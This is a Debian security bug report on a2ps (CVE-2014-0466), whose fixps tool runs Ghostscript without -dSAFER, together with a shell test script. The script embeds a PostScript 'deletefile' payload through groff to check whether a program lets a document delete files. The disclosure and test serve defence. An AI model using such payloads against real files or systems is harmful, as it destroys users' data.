Package: a2ps Version: 1:4.14-1.2 Severity: grave Tags: security fixps does not invoke gs with -dSAFER. As a consequence, a malicious PostScript file could delete files with the privileges of the invoking user.
I have provided a test script that can be invoked as such: ./test-wrapper-fixps fixps This was reported to the Debian Security Team, who assigned this CVE-2014-0466. It was also reported to upstream, who has not provided an update or issued a fixed version. This is being reported publicly as over 45 days has elapsed and neither upstream nor the security team has requested a delay or issued an advisory. -- System Information: Debian Release: jessie/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 3.14-rc7-amd64 (SMP w/4 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages a2ps depends on: ii file 1:5.17-1 ii libc6 2.18-4 ii libpaper1 1.1.24+nmu2 ii psutils 1.17.dfsg-1 Versions of packages a2ps recommends: ii bzip2 1.0.6-5 ii cups-bsd [lpr] 1.7.1-10 ii wdiff 1.2.1-2 Versions of packages a2ps suggests: pn emacsen-common <none> ii ghostscript 9.05~dfsg-8+b1 ii groff 1.22.2-5 pn gv <none> pn html2ps <none> ii imagemagick 8:6.7.7.10+dfsg-1 pn t1-cyrillic <none> ii texlive-binaries [texlive-base-bin] 2013.20130729.30972-2+b2 -- no debconf information -- brian m. carlson / brian with sandals: Houston, Texas, US +1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
#!/bin/sh # test-wrapper: test if a program is running gs without -dSAFER # # Usage: test-wrapper program --option --option2 TEMPDIR=`mktemp -d` [ -n "$TEMPDIR" ] || exit 1 touch "$TEMPDIR/remove-me" groff -Tps <<EOM | sed -e '/%%Pages/d' >"$TEMPDIR/exploit.ps" Text \X'ps: exec ($TEMPDIR/remove-me) deletefile' More text. EOM "$@" "$TEMPDIR/exploit.ps" >/dev/null if [ -e "$TEMPDIR/remove-me" ] then printf "Program is not vulnerable.\n" else printf "Program is VULNERABLE!\n" fi rm -r -- "$TEMPDIR"
signature.asc
Description: Digital signature